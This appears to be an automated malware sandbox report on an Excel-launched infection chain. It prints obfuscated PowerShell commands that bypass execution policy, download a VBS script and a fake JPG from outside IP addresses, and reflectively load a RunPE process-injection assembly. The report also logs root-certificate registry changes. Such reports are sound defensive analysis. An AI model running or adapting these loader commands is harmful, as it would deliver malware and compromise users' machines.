                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899E022D push eax; iretd 7_2_000007FE899E0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899E00BD pushad ; iretd 7_2_000007FE899E00C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_000007FE899C022D push eax; iretd 12_2_000007FE899C0241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_000007FE899C00BD pushad ; iretd 12_2_000007FE899C00C1
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                    Source: 12.2.powershell.exe.2cef590.1.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
                    Source: 12.2.powershell.exe.2f0000.0.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
                    Source: 12.2.powershell.exe.2f0000.0.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
                    Source: 12.2.powershell.exe.2f0000.0.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.dllJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
